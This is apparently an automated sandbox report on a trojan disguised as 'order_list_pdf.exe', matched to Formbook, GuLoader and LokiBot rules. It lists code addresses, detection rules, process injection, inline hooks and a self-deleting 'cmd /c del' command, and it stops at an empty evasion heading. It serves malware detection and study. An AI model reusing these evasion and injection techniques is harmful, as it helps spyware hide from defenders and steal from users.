      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403F300_2_00403F30
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402F360_2_00402F36
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402FC30_2_00402FC3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004027CC0_2_004027CC
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403FD80_2_00403FD8
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004027D90_2_004027D9
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004037E80_2_004037E8
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403FF00_2_00403FF0
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004027F30_2_004027F3
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004037F90_2_004037F9
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_004037870_2_00403787
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403F890_2_00403F89
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00402F940_2_00402F94
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_00403FBB0_2_00403FBB
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 0_2_0040EFBB0_2_0040EFBB
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C66114_2_1E0C6611
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0B76404_2_1E0B7640
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C4E614_2_1E0C4E61
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E15CE664_2_1E15CE66
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C5E704_2_1E0C5E70
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E153E964_2_1E153E96
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1626F84_2_1E1626F8
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1617464_2_1E161746
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1527824_2_1E152782
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0B57904_2_1E0B5790
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E161FCE4_2_1E161FCE
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0A740C4_2_1E0A740C
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0B14104_2_1E0B1410
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E14F42B4_2_1E14F42B
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E0C547E4_2_1E0C547E
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E1534904_2_1E153490
      Source: C:\Users\user\Desktop\order_list_pdf.exeCode function: 4_2_1E161C9F4_2_1E161C9F
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E1544EF
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E151D1B
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E162519
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E13C53F
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0B1530
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E090D40
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E15E581
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E15D5D2
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E14FDDB
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E141DE3
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E16E214
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E150A02
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0C523D
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0C4A5B
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E161A99
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0B42B0
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E1622DD
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0BFB40
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0C4B96
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0C63C2
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E09EBE0
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E15D016
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0CE020
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0C0021
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0C1070
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0AA080
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E1418B6
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0C48CB
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E1628E8
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0C7110
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0C594B
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0C6180
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E16D9BE
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E1619E2
      Source: C:\Windows\explorer.exe; Code function: 5_2_05FF9852
      Source: C:\Windows\explorer.exe; Code function: 5_2_05FF1CF2
      Source: C:\Windows\explorer.exe; Code function: 5_2_05FF0072
      Source: C:\Windows\explorer.exe; Code function: 5_2_05FF0069
      Source: C:\Windows\explorer.exe; Code function: 5_2_05FF6F52
      Source: C:\Windows\explorer.exe; Code function: 5_2_05FF4AF2
      Source: C:\Windows\explorer.exe; Code function: 5_2_05FF4AEF
      Source: C:\Windows\explorer.exe; Code function: 5_2_05FFCAAC
      Source: C:\Windows\explorer.exe; Code function: 5_2_05FF8679
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031CFB40
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031D63C2
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031AEBE0
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031D523D
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_03260A02
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_0327E214
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031D4A5B
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031C42B0
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_03271A99
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_032722DD
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031D594B
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_0327D9BE
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031D6180
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_032719E2
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_0326D016
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031D0021
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031DE020
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_032518B6
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031BA080
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_032728E8
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031D48CB
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_03271746
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031C5790
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_03262782
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_03271FCE
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031D6611
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_0326CE66
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031C7640
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031D5E70
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031D4E61
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_03263E96
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_032726F8
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_0324C53F
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_03272519
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031A0D40
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_0326E581
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_03251DE3
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_0326D5D2
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_0325FDDB
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_0325F42B
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031B740C
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031D547E
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_03263490
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_03271C9F
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_032644EF
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00B0B083
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00AF790B
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00AF7910
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00B0AAB8
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00B09CE6
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00B0B54D
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: String function: 1E0EDDE8 appears 33 times
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: String function: 1E09B0E0 appears 168 times
      Source: C:\Windows\SysWOW64\help.exe; Code function: String function: 031AB0E0 appears 162 times
      Source: order_list_pdf.exe, 00000000.00000002.559323075.000000000041A000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenameobj2Isenkrmmerens7.exe vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000000.00000002.560181752.0000000002050000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenameuser32j% vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000000.00000002.560389276.00000000020C0000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenameobj2Isenkrmmerens7.exeFE2X vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000004.00000002.672015263.000000001DBF0000.00000002.00000001.sdmp; Binary or memory string: OriginalFilenamemswsock.dll.muij% vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000004.00000002.673714450.000000001E31F000.00000040.00000001.sdmp; Binary or memory string: OriginalFilenamentdll.dllj% vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000004.00000003.663821755.00000000009F2000.00000004.00000001.sdmp; Binary or memory string: OriginalFilenameHelp.Exej% vs order_list_pdf.exe
      Source: order_list_pdf.exe, 00000004.00000000.557397549.000000000041A000.00000002.00020000.sdmp; Binary or memory string: OriginalFilenameobj2Isenkrmmerens7.exe vs order_list_pdf.exe
      Source: order_list_pdf.exe; Binary or memory string: OriginalFilenameobj2Isenkrmmerens7.exe vs order_list_pdf.exe
      Source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.664784374.00000000000A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.842795531.00000000036BE000.00000004.00000001.sdmp, type: MEMORY; Matched rule: LokiBot_Dropper_Packed_R11_Feb18, date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000004.00000002.672129627.000000001DE50000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.839035767.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.839087655.0000000000B20000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.839927203.0000000002CCC000.00000004.00000020.sdmp, type: MEMORY; Matched rule: LokiBot_Dropper_Packed_R11_Feb18, date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000002.839147457.0000000000B60000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@8/0@2/2
      Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4516:120:WilError_01
      Source: C:\Users\user\Desktop\order_list_pdf.exe; File created: C:\Users\user\AppData\Local\Temp\~DF4589BA9E930093E8.TMP
      Source: order_list_pdf.exe; Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\order_list_pdf.exe; File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\order_list_pdf.exe; File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe; File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe; File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\SysWOW64\help.exe; File read: C:\Windows\System32\drivers\etc\hosts
      Source: order_list_pdf.exe; Virustotal: Detection: 59%
      Source: order_list_pdf.exe; Metadefender: Detection: 13%
      Source: order_list_pdf.exe; ReversingLabs: Detection: 58%
      Source: unknown; Process created: C:\Users\user\Desktop\order_list_pdf.exe 'C:\Users\user\Desktop\order_list_pdf.exe'
      Source: unknown; Process created: C:\Users\user\Desktop\order_list_pdf.exe 'C:\Users\user\Desktop\order_list_pdf.exe'
      Source: unknown; Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: unknown; Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
      Source: unknown; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\order_list_pdf.exe'
      Source: unknown; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Process created: C:\Users\user\Desktop\order_list_pdf.exe 'C:\Users\user\Desktop\order_list_pdf.exe'
      Source: C:\Windows\SysWOW64\help.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\order_list_pdf.exe'
      Source: Window Recorder; Window detected: More than 3 window changes detected
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000002.875626376.000000000C2F0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: order_list_pdf.exe, 00000004.00000002.673209154.000000001E18F000.00000040.00000001.sdmp, help.exe, 00000007.00000002.840304446.0000000003180000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: order_list_pdf.exe, help.exe
      Source: Binary string: help.pdbGCTL source: order_list_pdf.exe, 00000004.00000002.664875944.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: help.pdb source: order_list_pdf.exe, 00000004.00000002.664875944.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000002.875626376.000000000C2F0000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match; File source: Process Memory Space: order_list_pdf.exe PID: 3644, type: MEMORY
      Source: Yara match; File source: Process Memory Space: order_list_pdf.exe PID: 4496, type: MEMORY
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_004098DD push ss; retf 0_2_0040990B
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_00409943 push ss; retf 0_2_00409A0B
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_00407124 push ebx; iretd 0_2_00407125
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_00407127 push ebx; retf 0_2_00407129
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_004099DD push ss; retf 0_2_00409A0B
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_00407B38 push edi; retf 0_2_00407B4E
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_00408C6B push ebp; iretd 0_2_00408C6C
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_004054DB push ds; retf 0_2_00405507
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_0040B50F push ebp; iretd 0_2_0040B510
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_0040BDB9 push esi; iretd 0_2_0040BDBA
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_0040BEDD push esi; iretd 0_2_0040BEDE
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_004097B9 push ss; retf 0_2_0040990B
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_02095323 push ebp; retf 0_2_0209534B
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 0_2_0209542F push ebp; retf 0_2_0209544B
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Code function: 4_2_1E0EDE2D push ecx; ret 4_2_1E0EDE40
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_031FDE2D push ecx; ret 7_2_031FDE40
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00B09AA2 push eax; ret 7_2_00B09AA8
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00B09AAB push eax; ret 7_2_00B09B12
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00B07A39 push ebp; iretd 7_2_00B07A3A
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00B09A55 push eax; ret 7_2_00B09AA8
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00B09B0C push eax; ret 7_2_00B09B12
      Source: C:\Windows\SysWOW64\help.exe; Code function: 7_2_00B0AE81 push cs; ret 7_2_00B0AE87

      Hooking and other Techniques for Hiding and Protection:

      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exe; User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xF3 0x32
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\order_list_pdf.exe; Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\help.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion: